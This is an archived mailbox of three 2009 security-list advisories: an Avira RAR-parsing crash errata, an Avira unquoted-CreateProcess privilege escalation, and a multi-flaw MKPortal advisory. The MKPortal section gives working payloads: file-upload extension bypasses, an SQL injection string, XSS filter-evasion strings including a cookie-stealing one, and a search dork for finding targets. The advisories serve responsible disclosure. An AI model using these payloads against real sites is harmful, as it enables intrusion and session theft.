Suite 117                           Fax: +44 (0) 1308 867 949
61 Victoria Road
Surbiton
Surrey                              mailto:adam@algroup.co.uk
KT6 4JX                             http://rfidiot.org

From - Thu Jan 15 12:52:18 2009
X-Account-Key: account7
X-UIDL: 4909bb8c000059f8
X-Mozilla-Status: 0001
X-Mozilla-Status2: 00000000
Return-Path: <bugtraq-return-39196-lists=securityspace.com@securityfocus.com>
X-Original-To: lists@securityspace.com
Delivered-To: lists@securityspace.com
Received: from outgoing3.securityfocus.com (outgoing.securityfocus.com [205.206.231.27])
by mx.securityspace.com (Postfix) with ESMTP id 5D65EED8EC
for <lists@securityspace.com>; Thu, 15 Jan 2009 12:49:16 -0500 (EST)
Received: from lists2.securityfocus.com (lists2.securityfocus.com [205.206.231.20])
by outgoing3.securityfocus.com (Postfix) with QMQP
id 7BB9E23707B; Thu, 15 Jan 2009 08:45:07 -0700 (MST)
Mailing-List: contact bugtraq-help@securityfocus.com; run by ezmlm
Precedence: bulk
List-Id: <bugtraq.list-id.securityfocus.com>
List-Post: <mailto:bugtraq@securityfocus.com>
List-Help: <mailto:bugtraq-help@securityfocus.com>
List-Unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
List-Subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
Delivered-To: mailing list bugtraq@securityfocus.com
Delivered-To: moderator for bugtraq@securityfocus.com
Received: (qmail 10035 invoked from network); 15 Jan 2009 14:49:15 -0000
Resent-Cc: recipient list not shown: ;
Resent-Date: Thu, 15 Jan 2009 08:13:10 -0700
Resent-Message-Id: <200901151513.n0FFDAhE022787@mx1.securityfocus.com>
Date: Thu, 15 Jan 2009 16:13:07 +0100
From: Thierry Zoller <Thierry@Zoller.lu>
Organization: Kachkeis CoKG
X-Priority: 3 (Normal)
Message-ID: <1734516223.20090115161307@Zoller.lu>
To: NTBUGTRAQ <NTBUGTRAQ@LISTSERV.NTBUGTRAQ.COM>,
bugtraq <bugtraq@securityfocus.com>,
full-disclosure <full-disclosure@lists.grok.org.uk>,
<vuln@secunia.com>, <cert@cert.org>, <nvd@nist.gov>, <cve@mitre.org>,
<vulndb@securityfocus.com>
Subject: Errata: [TZO-2009-1] Avira Antivir - RAR - Division by Zero &  Null Pointer Dereference
Resent-From: Thierry Zoller <Thierry@Zoller.lu>
MIME-Version: 1.0
Content-Type: text/plain; charset=iso-8859-15
Content-Transfer-Encoding: 8bit
X-Originating-IP: 91.50.111.156
Status:   

Errata :

Products listed but not affected :
AVIRA WebProtector for KEN! - Reason: Does not use the Scan Engine
Avira AntiVir Mobile - Reason: Does not use the same AV Engine

Avira requested the following products to be removed from the list,
for the reason that they are license models and not products per se,
it is arguable whether they should be listed or not, since the
licenses (most likely) include the vulnerable products:

AVIRA WebGate Suite - Reason: is a License Model
AVIRA SmallBusiness Suite -> Reason: is a License Model
AVIRA Business Bundle -> Reason: is a License Model
AVIRA AntiVir NetWork Bundle -> Reason: is a License Model
AVIRA AntiVir NetGate Bundle -> Reason: is a License Model
AVIRA AntiVir GateWay Bundle -> Reason: is a License Model
AVIRA AntiVir Campus (for Education) -> Reason: is a License Model

List of undisputed affected products :

Avira Antivr Free
Avira AntiVir Premium
Avira Premium Security Suite
Avira AntiVir Professional
Avira AntiVir for KEN! 4
Avira AntiVir SharePoint
Avira AntiVir Virus Scan Adapter for SAP NetWeaver�
Avira AntiVir MailGate
Avira MailGate Suite
Avira AntiVir Exchange
Avira AntiVir MIMEsweeper
Avira AntiVir Domino
Avira AntiVir WebGate
Avira WebGate Suite
Avira AntiVir ISA Server
Avira AntiVir MIMEsweeper



______________________________________________________________________

     Avira - RAR -Division by Zero & Null Pointer Dereference
______________________________________________________________________

Reference     : [TZO-2009-1]-Avira Antivir
Location      : http://blog.zoller.lu/2009/01/advisory-tzo-2009-1-avira-antivir-rar.html
Products      : Avira Antivr Free
                Avira AntiVir Premium
                Avira Premium Security Suite
                Avira AntiVir Professional
                Avira AntiVir for KEN! 4
                Avira AntiVir SharePoint
                Avira AntiVir Virus Scan Adapter for SAP NetWeaver�
                Avira AntiVir MailGate
                Avira MailGate Suite
                Avira AntiVir Exchange
                Avira AntiVir MIMEsweeper
                Avira AntiVir Domino
                Avira AntiVir WebGate
                Avira WebGate Suite
                Avira AntiVir ISA Server
                Avira AntiVir MIMEsweeper
                                
Vendors and Products using the Avira Engine :
Important : The impact of this flaw on those devices  has  not  been
tested nor confirmed to exist, there is however  reason  to  believe
that    the    flaw    existed    in    this    products     aswell.

http://www.avira.com/documents/utils/pdf/products/pi_system-integration_en.pdf

               AXIGEN Mail Server
               Clearswift Mimesweeper
               GeNUGate and GeNUGate Pro (optional addon)
               IQ.Suite                 

Vendor        : http://www.avira.de



I. Background
~~~~~~~~~~~~~
Avira is a leading worldwide provider of  self-developed  protection
solutions for professional and private use. The company  belongs  to
the pioneers in this  sector  with  over  twenty  years  experience.

The protection experts have numerous  company  locations  throughout
Germany and cultivate partnerships in  Europe,   Asia  and  America.
Avira has more than 180 employees at their main office  in  Tettnang
near Lake Constance and is one  of  the  largest  employers  in  the
region.  There  are  around  250  people  employed  worldwide  whose
commitment is continually being confirmed by awards.  A  significant
contribution to protection is the Avira AntiVir  Personal  which  is
being  used  by   private    users    a    million    times    over.

AV-Comparatives e.V.  have  chosen  Avira  AntiVir  Premium  as  the
best anti-virus solution of 2008 

II. Description
~~~~~~~~~~~~~~~
By manipulating certain fields inside a  RAR  archive  and  attacker
might trigger division by zero and null point exceptions. The attack vector  should  be  rated as  remote  as  an  attachement  to    an    e-mail    is    enough.

*Anybody  else  noticed  that  the  amount  of  details   in    most
advisories have *become less than usefull ?*


III. Impact
~~~~~~~~~~~~~~~
In some cases the  impact  is  a  Denial  of  Service  condition  in
others to an invalid read size  of  4  bytes  which  again  in  some
cases lead to an null pointer dereference.

The RAR parser inside the  module  leads  to  various  errors  whose
exploitability index is rated "I don't have time for this now  -  so
let's say 'maybe'" also sometimes known as "I lack the  time  and/or
the skill to do so". 


FAULTING_IP: 
aepack!module_get_api+20ed9
0131cad9 8b10            mov     edx,dword ptr [eax]

EXCEPTION_RECORD:  ffffffff -- (.exr 0xffffffffffffffff)
ExceptionAddress: 0131cad9 (aepack!module_get_api+0x00020ed9)
   ExceptionCode: c0000005 (Access violation)
   ExceptionFlags: 00000000
NumberParameters: 2
   Parameter[0]: 00000000
   Parameter[1]: 00000268
Attempt to read from address 00000268

FAULTING_THREAD:  00000144
DEFAULT_BUCKET_ID:  INVALID_POINTER_READ

PROCESS_NAME:  avscan.exe
OVERLAPPED_MODULE: Address regions for 'AVREP' and 'rcimage.dll' overlap

READ_ADDRESS:  00000268 
BUGCHECK_STR:  APPLICATION_FAULT_INVALID_POINTER_READ_CORRUPT_MODULELIST_OVERLAPPED_MODULE
LAST_CONTROL_TRANSFER:  from 0131cb8c to 0131cad9

STACK_TEXT:  

0194f5fc 0131cb8c 0115bbfc 00000003 00000100 aepack!module_get_api+0x20ed9
0194f618 01319b96 0115bbfc 074cc4f4 00000002 aepack!module_get_api+0x20f8c
0194f654 0131a45a 00000010 01157160 00000001 aepack!module_get_api+0x1df96
0194f668 0131e7e0 000000d4 00f48ba8 011530d0 aepack!module_get_api+0x1e85a
0194f68c 01318c35 01157160 00000010 011530d0 aepack!module_get_api+0x22be0
00000000 00000000 00000000 00000000 00000000 aepack!module_get_api+0x1d035

FOLLOWUP_IP: 
aepack!module_get_api+20ed9
0131cad9 8b10            mov     edx,dword ptr [eax]

SYMBOL_NAME:  aepack!module_get_api+20ed9
MODULE_NAME: aepack
IMAGE_NAME:  aepack.dll
STACK_COMMAND:  ~2s ; kb

FAILURE_BUCKET_ID:  INVALID_POINTER_READ_c0000005_aepack.dll!module_get_api
BUCKET_ID:  APPLICATION_FAULT_INVALID_POINTER_READ_CORRUPT_MODULELIST_OVERLAPPED_MODULE_aepack!module_get_api+20ed9


IV. Disclosure Timeline
~~~~~~~~~~~~~~~~~~~~~~~~
The    Vulnerability    notification    policy    i    adhere    to:
http://blog.zoller.lu/search/label/Vulnerability%20disclosure%20Policy

 
17/12/2008  :  Sent  notice   to    the    correct    mail    adress
security@avira. com

17/12/2008 : Avira achknowledges receipt 

17/12/2008 : Avira sends details of  the  root  cause  on  the  same
day "The  crash  occurs  in  a  heavily  corrupted,   generated  RAR
archive while extracting the contents of the 22nd  file.   We  can't
give  any  file  names  as  they  are  non-printable  characters.  "

13/01/2009 : Avira notifies me that the  issue  was  fixed  with  an
update that shipped with AVPack 8.1.3.5  on  the  09/01/2009

14/01/2009 : Avira states  that  all  products  have  been  affected
except  "Securityy  Management  Center"  and  the  "Internet  Update
Manager". "Das bedeutet im Prinzip wirklich alle  Produkte,   ausser
Produkte wie eben das Security Management Center oder  der  Internet
Update Manager"

14/01/2009 : Release of this advisory 


Thierry Zoller
http://blog.zoller.lu

From - Thu Jan 15 15:42:48 2009
X-Account-Key: account7
X-UIDL: 4909bb8c000059fa
X-Mozilla-Status: 0001
X-Mozilla-Status2: 00000000
Return-Path: <bugtraq-return-39197-lists=securityspace.com@securityfocus.com>
X-Original-To: lists@securityspace.com
Delivered-To: lists@securityspace.com
Received: from outgoing3.securityfocus.com (outgoing.securityfocus.com [205.206.231.27])
by mx.securityspace.com (Postfix) with ESMTP id 2A9A5ED928
for <lists@securityspace.com>; Thu, 15 Jan 2009 15:38:02 -0500 (EST)
Received: from lists2.securityfocus.com (lists2.securityfocus.com [205.206.231.20])
by outgoing3.securityfocus.com (Postfix) with QMQP
id 282FC236F43; Thu, 15 Jan 2009 13:21:02 -0700 (MST)
Mailing-List: contact bugtraq-help@securityfocus.com; run by ezmlm
Precedence: bulk
List-Id: <bugtraq.list-id.securityfocus.com>
List-Post: <mailto:bugtraq@securityfocus.com>
List-Help: <mailto:bugtraq-help@securityfocus.com>
List-Unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
List-Subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
Delivered-To: mailing list bugtraq@securityfocus.com
Delivered-To: moderator for bugtraq@securityfocus.com
Received: (qmail 19896 invoked from network); 15 Jan 2009 17:19:27 -0000
Resent-Cc: recipient list not shown: ;
Resent-Date: Thu, 15 Jan 2009 10:43:24 -0700
Resent-Message-Id: <200901151743.n0FHhOXJ003903@mx2.securityfocus.com>
Date: Thu, 15 Jan 2009 18:43:00 +0100
From: Thierry Zoller <Thierry@Zoller.lu>
Organization: Kachkeis CoKG
X-Priority: 3 (Normal)
Message-ID: <151212550.20090115184300@Zoller.lu>
To: NTBUGTRAQ <NTBUGTRAQ@LISTSERV.NTBUGTRAQ.COM>,
bugtraq <bugtraq@securityfocus.com>,
full-disclosure <full-disclosure@lists.grok.org.uk>,
<info@circl.etat.lu>, <vuln@secunia.com>, <cert@cert.org>,
<nvd@nist.gov>, <cve@mitre.org>
Subject: [TZO-2009-2] Avira Antivir - Priviledge escalation
Resent-From: Thierry Zoller <Thierry@Zoller.lu>
MIME-Version: 1.0
Content-Type: text/plain; charset=windows-1252
Content-Transfer-Encoding: quoted-printable
X-Originating-IP: 91.50.111.156
Status:   

___________________________________________________________________

From  the 'cover-your-basics' and from the 'they-still-exist-department'
   Antivir insecure CreateProcess() usage - Privilege Esclation
                 and autostart as free bonus
___________________________________________________________________

Reference     : [TZO-2009-2]-Avira Antivir Priviledge escalation
WWW           : http://blog.zoller.lu/2009/01/tzo-2009-2-avira-antivir-priviledge.html
Product       : AV7/AV8 desktop products :
                - Avira AntiVir Premium
                - Avira Premium Security Suite
                - Avira AntiVir Professional
Vendor        : http://www.avira.de


I. Background
~~~~~~~~~~~~~
Avira AntiVir is a reliable  free  antivirus  solution,   that
constantly and  rapidly  scans  your  computer  for  malicious
programs such as viruses, Trojans, backdoor programs,  hoaxes,
worms, dialers etc. Monitors  every  action  executed  by  the
user or the  operating  system  and  reacts  promptly  when  a
malicious program is detected.

The  protection  experts  have  numerous  company    locations
throughout  Germany  and  cultivate  partnerships  in  Europe,
Asia and America. Avira has more than 180 employees  at  their
main office in Tettnang near Lake  Constance  and  is  one  of
the largest employers in the region.   There  are  around  250
people employed  worldwide  whose  commitment  is  continually
being confirmed by  awards.   A  significant  contribution  to
protection is the Avira AntiVir Personal which is  being  used
by private users a million times over.

AV-Comparatives e.V. have  chosen  Avira  AntiVir  Premium  as
the best anti-virus solution of 2008 


II. Description
~~~~~~~~~~~~~~~
No funky IOCTL just a plain unsafe  call  to  CreateProcess().
In detail, the  scheduler  (sched. exe)  running  with  SYSTEM
privileges calls the  CreateProcess()  API  without  enclosing
lpCommandLine  in  quotes  to  _regularly_  shell   avwsc.exe

Calling an executable with a path has spaces  in  it  and  not
using  quotes  will  trigger  windows  to  search   for    the
executable in various areas.

Calling for instance -  

 CreateProcess(
  NULL,
  c:\program files\avira\antivir PersonalEdition Classic\avwsc.exe,
  ...
  );
   
will first look for
c:\program.exe
and then
c:\program files\avira\antivir.exe

This is documented and intended behaviour as can be seen at : 
http://msdn.microsoft.com/en-us/library/ms682425.aspx

Quoting ms682425.aspx : 
The lpApplicationName parameter can be NULL. In that case,  
the module  name  must  be  the  first  white  space�delimited
token in the lpCommandLine string. If you  are  using  a  long
file name that  contains  a  space,   use  quoted  strings  to
indicate where the file name ends  and  the  arguments  begin;
otherwise, the file name is ambiguous. For example,   consider
the string  "c:\program  files\sub  dir\program  name".   This
string can be interpreted in a number  of  ways.   The  system
tries to interpret the possibilities in the  following  order:


c:\program.exe files\sub dir\program name, c:\program files\sub.exe dir\program name
c:\program files\sub dir\program.exe name, c:\program files\sub dir\program name.exe 

Pre-conditions for a CreateProcess() call to be insecure :
- lpApplicationName contains a NULL 
- the path in lpCommandLine cotains white space 
- the path in lpCommandLine is not enclosed in quotation marks

III. Impact
~~~~~~~~~~~
- Elevation of privileges from USER to SYSTEM  is  possible  
by  writing the payload  to c:\program files\avira\antivir.exe    
- Autostart vector - The payload will be executed even  after 
a reboot

IV. Disclosure Timeline
~~~~~~~~~~~~~~~~~~~~~~~~
28/09/2008 : Contacted and send bug report to Avira
28/09/2008 : Avira acknowledges receipt
01/10/2008 : Avira notifies me that the issue will be fixed 
             with there next Emergency Update (EU2)
24/10/2008 : The update is pushed to customers
24/10/2008 : Avira notifies me that credits have been posted 
here: http://www1.avira.com/en/support/faq/details.html?id=419             
15/01/2009 : Release of this advisory


References :
[1] http://lists.grok.org.uk/pipermail/full-disclosure/2005-November/038789.html
[2] CreateProcess() - http://msdn.microsoft.com/en-us/library/ms682425.aspx
[3] Book: Fuzzing - Brute force vulnerability discovery
[4] Loadlibrary() -  http://msdn.microsoft.com/en-us/library/ms684175(VS.85).aspx
If the string does not specify a path, the function uses a standard search strategy to find the file.


From - Thu Jan 15 15:52:49 2009
X-Account-Key: account7
X-UIDL: 4909bb8c000059fb
X-Mozilla-Status: 0001
X-Mozilla-Status2: 00000000
Return-Path: <bugtraq-return-39198-lists=securityspace.com@securityfocus.com>
X-Original-To: lists@securityspace.com
Delivered-To: lists@securityspace.com
Received: from outgoing3.securityfocus.com (outgoing.securityfocus.com [205.206.231.27])
by mx.securityspace.com (Postfix) with ESMTP id C0DB5ED8A2
for <lists@securityspace.com>; Thu, 15 Jan 2009 15:50:13 -0500 (EST)
Received: from lists2.securityfocus.com (lists2.securityfocus.com [205.206.231.20])
by outgoing3.securityfocus.com (Postfix) with QMQP
id 71405237074; Thu, 15 Jan 2009 13:21:57 -0700 (MST)
Mailing-List: contact bugtraq-help@securityfocus.com; run by ezmlm
Precedence: bulk
List-Id: <bugtraq.list-id.securityfocus.com>
List-Post: <mailto:bugtraq@securityfocus.com>
List-Help: <mailto:bugtraq-help@securityfocus.com>
List-Unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
List-Subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
Delivered-To: mailing list bugtraq@securityfocus.com
Delivered-To: moderator for bugtraq@securityfocus.com
Received: (qmail 25568 invoked from network); 15 Jan 2009 18:39:15 -0000
Date: Thu, 15 Jan 2009 11:43:55 -0700
Message-Id: <200901151843.n0FIhtOS024799@www3.securityfocus.com>
Content-Type: text/plain
Content-Disposition: inline
Content-Transfer-Encoding: binary
MIME-Version: 1.0
X-Mailer: MIME-tools 5.420 (Entity 5.420)
From: come2waraxe@yahoo.com
To: bugtraq@securityfocus.com
Subject: [waraxe-2009-SA#070] - Multiple Vulnerabilities in MKPortal <= 1.2.1
Status:   

[waraxe-2009-SA#070] - Multiple Vulnerabilities in MKPortal <= 1.2.1
=============================================================================
Author: Janek Vind "waraxe"
Date: 15. January 2009
Location: Estonia, Tartu
Web: http://www.waraxe.us/advisory-70.html


Description of vulnerable software:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

MKPortal is a free Portal/Content Management System (CMS) which seamlessly
integrates with the most popular forum softwares. It uses the forum user
management system and other features and adds many powerful modules to create
and manage a light but powerful web site. MKPortal has an intuitive user
interface and is very simple to install and administer.

Homepage: http://www.mkportal.it/


List of found vulnerabilities
==============================================================================
1. Insecure file upload in blog personal gallery
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Security risk: critical
Preconditions:
 1. attacker must be registered user
 2. attacker must have blog editing privileges

Registered users with blog keeping privileges can access personal gallery
functionality, example URL:

http://localhost/mkportal.1.2.1/index.php?ind=blog&op=p_gal

They can also upload image files to the server. File uploading can be
dangerous without proper security checks. So let's have a closer look
at the source code of "modules/blog/index.php" line ~2452: 

---------------------[source code]---------------------
function upload_imm () {
global $mkportals, $DB, $mklib, $Skin, $_FILES;

..
$file =  $_FILES['FILE_UPLOAD']['tmp_name'];
$file_name =  $_FILES['FILE_UPLOAD']['name'];
//$file_type =  $_FILES['FILE_UPLOAD']['type'];
$peso =  $_FILES['FILE_UPLOAD']['size'];

if (!$file) {
$message = "{$mklib->lang['b_compfile']}";
$mklib->error_page($message);
exit;
}

//Validate file extension
$file_ext = preg_replace("`.*\.(.*)`", "\\1", $file_name);
$file_ext = substr ($file_name, (strlen($file_name)-3), 3);
$file_ext = strtolower($file_ext);

switch($file_ext)
{
case 'gif':
$ext = 'gif';
break;
case 'jpg':
$ext = 'jpg';
break;
case 'png':
$ext = 'png';
break;
case 'tif':
$ext = 'tif';
break;
case 'bmp':
$ext = 'bmp';
break;
default:
$ext = 'not_supported';
break;
}
if ($ext == "not_supported")  {
$message = "{$mklib->lang['b_gnotsup']}";
$mklib->error_page($message);
exit;
}

--------------------[/source code]---------------------

So this piece of code suppose to be let in only files with specific extensions.
In reality it will pass through files like "foobar.agif" or "whatever.pbmp ...
Let's assume, that we have jpg picture named "pic.php.jjpg". This can be valid
picture file and in same time contain malicious php code inside.

What happens next:

---------------------[source code]---------------------
//Move file from server tmp directory to blog "tmp" directory
if (!move_uploaded_file("$file", "mkportal/blog/images/tmp/$file_name")) {
$message = "{$mklib->lang['b_nopermupl']}";
$mklib->error_page($message);
exit;
}
@chmod("mkportal/blog/images/tmp/$file_name", 0644);

//Validate by mime type
$tmpfilename = "mkportal/blog/images/tmp/$file_name";
$size = @getimagesize($tmpfilename);
//If getimagesize does not recognize file as an image delete file
if (!$size)  {
@unlink($tmpfilename);
$message .= "{$mklib->lang['error_filetype']}";
$mklib->error_page($message);
exit;
}
--------------------[/source code]---------------------

As this image file is perfectly normal jpg picture, then it will bypass
"getimagesize()" successfully. And "chmod()" will not make any differents in
specific situation.

Next:

---------------------[source code]---------------------
$file_type = $size['mime'];

if (!$mklib->check_attach($file_type, $file_ext))  {
//Delete invalid file and display error
@unlink($tmpfilename);
$message .= "{$mklib->lang['b_gnotsup']}";
$mklib->error_page($message);
exit;
}

//Validate by file contents
$fcontents = file_get_contents ($tmpfilename);
$carray = array("html", "javascript", "vbscript", "alert",
 "onmouseover", "onclick", "onload", "onsubmit");
foreach ($carray as $fch) {
             if (strstr($fcontents, $fch)) {
                 @unlink($tmpfilename);
$message .= "{$mklib->lang['error_filetype']}";
$mklib->error_page($message);
                 exit;
             }
         }
         if (preg_match("#script(.+?)/script#ies", $fcontents)) {
            @unlink($tmpfilename);
$message .= "{$mklib->lang['error_filetype']}";
$mklib->error_page($message);
             exit;
}
--------------------[/source code]---------------------

Again, MIME-type will be correct and html-code detection can't stop
malicious php code inside of that jpg file. 

Finally:

---------------------[source code]---------------------
$image = $totr.$file_name;

//move file from "tmp" directory to "images" directory
@rename($tmpfilename, "mkportal/blog/images/$image");
--------------------[/source code]---------------------

What's the possibilities? Attacker can upload picture file with php code
inside with filename like "pic.php.pjpg" and it will be stored in remote
server as result. And when attacker issues direct request to uploaded
picture:

http://localhost/mkportal.1.2.1/mkportal/blog/images/1pic.php.pjpg"

.. then in case of Apache webserver php code inside of picture will
be executed. Therefore it's basically remote php code execution.


2. Insecure file upload in Downloads module
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Security risk: critical
Preconditions:
 1. attacker must be registered user

Registered users can add new files in downloads module by default:

http://localhost/mkportal.1.2.1/index.php?ind=downloads&op=submit_file

Let's look at "mkportal/modules/Downloads/index.php" line ~662:

---------[source code]--------------------------
function add_file() {

     global $mkportals, $DB,  $_FILES, $mklib, $mklib_board;
..
//Replace illegal sub-extensions
$com_types = array('com', 'exe', 'bat', 'scr', 'pif', 'asp',
 'cgi', 'pl', 'php');
foreach ($com_types AS $bad) {
$file_name = str_replace(".$bad", "_$bad", $file_name);
---------[/source code]--------------------------

At first look this seems to be good security measure. If we try to upload
trojanized file with php code inside named "test.php.zzz', then it will be
transformed to "test_php.zzz" and php code execution is not possible.
But wait a minute ... "str_replace()" is case sensitive, right? So, what if
we try to upload "test.Php.zzz"? Yes, code fragment above will not trigger and
we end up with potentially dangerous uploaded file on remote server. It's easy
to find out URL to that file. First, let's look at file's download link:

http://localhost/mkportal.1.2.1/index.php?ind=downloads&op=download_file&ide=3
&file=test.Php.zzz

Here we can determine, that "ide=3". And this is the direct file request URL:

http://localhost/mkportal.1.2.1/mkportal/modules/downloads/file/mk_3_test.Php.mk

And it appears, that Apache does not care, if it's "php" or "Php" or "PHP", it
will parse the file as php script anyway. And as result any registered user with
file adding rights in downloads block can have arbitrary php code execution
possibilities in remote server.


3. Race condition in multiple modules file upload functionality
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Security risk: medium
Preconditions:
 1. attacker must be registered user
 2. multiple tries needed for successful exploitation

Affected modules are Blog (gallery file upload), Reviews and Image Gallery.
For example let's look at Image Gallery's file upload code:

---------[source code]--------------------------
if (!$FILE_UPLOAD && $FILE_URL) {
//Copy file from remote server to gallery "tmp" directory
if (!copy("$file", "mkportal/modules/gallery/album/tmp/$file_name")) {
$message = "{$mklib->lang['ga_errorupl']}";
$mklib->error_page($message);
exit;
}
} else {
//Move file from local server tmp directory to gallery "tmp" 
directory
if (!move_uploaded_file("$file", "mkportal/modules/gallery/album/
tmp/$file_name")) {
$message = "{$mklib->lang['ga_errorupl']}";
$mklib->error_page($message);
exit;
}
}
@chmod("mkportal/modules/gallery/album/tmp/$file_name", 0644);
..
//Validate by mime type
$tmpfilename = "mkportal/modules/gallery/album/tmp/$file_name";
$size = @getimagesize($tmpfilename);
//If getimagesize does not recognize file as an image delete file
if (!$size)  {
@unlink($tmpfilename);
$message .= "{$mklib->lang['ga_notsup']}";
$mklib->error_page($message);
exit;
}
---------[/source code]--------------------------

So there exists timeframe, where temporary file is allready  moved to "tmp"
directory, but it is not yet deleted. If attacker manages to issue request
like this

http://localhost/mkportal.1.2.1/mkportal/modules/Gallery/album/
tmp/pic.php.pjpg

.. in right time, then remote php code execution may be possible.
It is classical race condition and success probability of single try is
very limited, but it's possible to make thousands of tries, until hitting
the jackpot. And by the way, "chmod(0644)" does not matter in specific case :)


4. Sql Injection in Blog module template editing
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Security risk: medium
Preconditions:
 1. attacker must be registered user
 2. attacker must have blog editing privileges
 3. magic_quotes_gpc=off (rare in real-world servers)

Let's look at source code of "modules/blog/index.php" line ~1441:

---------------------[source code]---------------------
function save_template () {
global $mkportals, $DB, $Skin, $mklib;
..
$idb = $mkportals->member['id'];
$template = $_POST['template'];
$template = $this->clean_template($template);
$template2 = $_POST['template2'];
$template2 = $this->clean_template($template2);

$DB->query("UPDATE mkp_blog SET template = '$template',
 template2 = '$template2' WHERE id = '$idb'");
--------------------[/source code]---------------------

No "addslashes()" or "mysql_real_escape_string()" is used, so sql injection
is possible, if "magic_quotes_gpc" setting is "off".

Proof of concept:

a) Go to blog template editing interface:

http://localhost/mkportal.1.2.1/index.php?ind=blog&op�it_template

b) Insert text into the "Home Template" textarea:

',template=@@version,template2='

.. and hit "Update Template". As result MysSql version is shown instead
of blog content.



5. Reflected XSS in "handler_image.php"
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Security risk: medium
Preconditions: none

Example:

http://localhost/mkportal.1.2.1/mkportal/modules/rss/handler_image.php
?i=<script>alert(123);</script>


6. Stored XSS in blog templates
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Security risk: medium
Preconditions:
 1. attacker must be registered user
 2. attacker must have blog editing privileges

MKportal offers blog functionality to all registered users. Blog access and
creation is enabled by default. Quick search in Google reveals, that many
websites have enabled blog module.

Google dork: inurl:"index.php?ind=blog"

Any registered user with blog editing privileges can modify his own
blog templates. Templates are stored in database. Blog owner can manipulate
templates html source in arbitrary ways, but some security filtering is
in place, in order to prevent inserting potentially malicious content
(Javascript, VBScript, ...) into blog templates.

Let's look at source code of "modules/blog/index.php" line ~1441:

---------------------[source code]---------------------
function save_template () {
global $mkportals, $DB, $Skin, $mklib;
..
$idb = $mkportals->member['id'];
$template = $_POST['template'];
$template = $this->clean_template($template);
$template2 = $_POST['template2'];
$template2 = $this->clean_template($template2);

$DB->query("UPDATE mkp_blog SET template = '$template',
 template2 = '$template2' WHERE id = '$idb'");
--------------------[/source code]---------------------

So we can see, that security filtering is handled by function
"clean_template()". Let's look inside of this function:

---------------------[source code]---------------------
function clean_template ($t="") {
..
        while( preg_match( "#script(.+?)/script#ies", $t ) ) {
                $t = preg_replace( "#script(.+?)/script#ies", "" , $t);
        }
        $t = preg_replace( "/javascript/i", "", $t );
        //$t = preg_replace( "/about/i" , "", $t );
        $t = preg_replace( "/vbscript/i" , "", $t );
        $t = preg_replace( "/alert/i" , "", $t );
        $t = preg_replace( "/onmouseover/i", "", $t );
        $t = preg_replace( "/onclick/i" , "", $t );
        $t = preg_replace( "/onload/i" , "", $t );
        $t = preg_replace( "/onsubmit/i" , "", $t );

..
$t = preg_replace( "/ecmascript/i" , "", $t );
  $t = preg_replace( "/about:/si" , "", $t );
$t = preg_replace( "/data:/si" , "", $t );
$t = preg_replace( "/onfocus/i" , "", $t );
$t = preg_replace( "/onblur/i" , "", $t );
$t = preg_replace( "/ondblclick/i" , "", $t );
$t = preg_replace( "/onmousedown/i" , "", $t );
$t = preg_replace( "/onmouseup/i" , "", $t );
$t = preg_replace( "/onmousemove/i" , "", $t );
$t = preg_replace( "/onmouseout/i" , "", $t );
$t = preg_replace( "/onkeypress/i" , "", $t );
$t = preg_replace( "/onkeydown/i" , "", $t );
$t = preg_replace( "/onkeyup/i" , "", $t );
$t = preg_replace( "/onunload/i" , "", $t );
      $t = preg_replace( "/onabort/i" , "", $t );
      $t = preg_replace( "/onerror/i" , "", $t );
$t = preg_replace( "/onchange/i" , "", $t );
$t = preg_replace( "/onreset/i" , "", $t );
$t = preg_replace( "/onselect/i" , "", $t );
$t = preg_replace( "/document\./i" , "", $t );
$t = preg_replace( "/window\./i" , "", $t );

..
        return $t;
    }

--------------------[/source code]---------------------

This kind of filtering is example of flawed-by-design implementation.
If someone wants insert javascript into blog template, then it's still
possible! Here are some working examples:

<body ononsubmitload=aleonsubmitrt(123);>

<salertcript>aalertlert(123);</salertcript>


7. Stored XSS in Reviews module comments functionality
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Security risk: medium
Preconditions:
 1. attacker must be registered user
 2. attacker must have Reviews comments editing privileges

There are some security measures against script injection in comments
text, but still it's possible to sneak through those filters. Example:

<marquee loop=1 onfinish=alert(document.cookie) width=0></marquee>

This script will be executed, when someone opens review with this comment.
As result, cookie theft and other attacks may be possible. 


8. Stored XSS in News module comments functionality
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Security risk: medium
Preconditions:
 1. attacker must be registered user
 2. attacker must have news comments editing privileges

Same story, as in previous case - filtering exists, but can be bypassed.



9. Full path disclosure in "index.php"
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Security risk: low
Preconditions: display_errors = Off

Example:

http://localhost/mkportal.1.2.1/?ind[]

Result:

Warning: Illegal offset type in isset or empty in 
C:\apache_wwwroot\mkportal.1.2.1\index.php on line 102


Greetings:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Greets to ToXiC, y3dips, Sm0ke, Heintz, slimjim100, pexli, mge, str0ke,
to all active waraxe.us forum members and to anyone else who know me! 


Contact:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

come2waraxe@yahoo.com
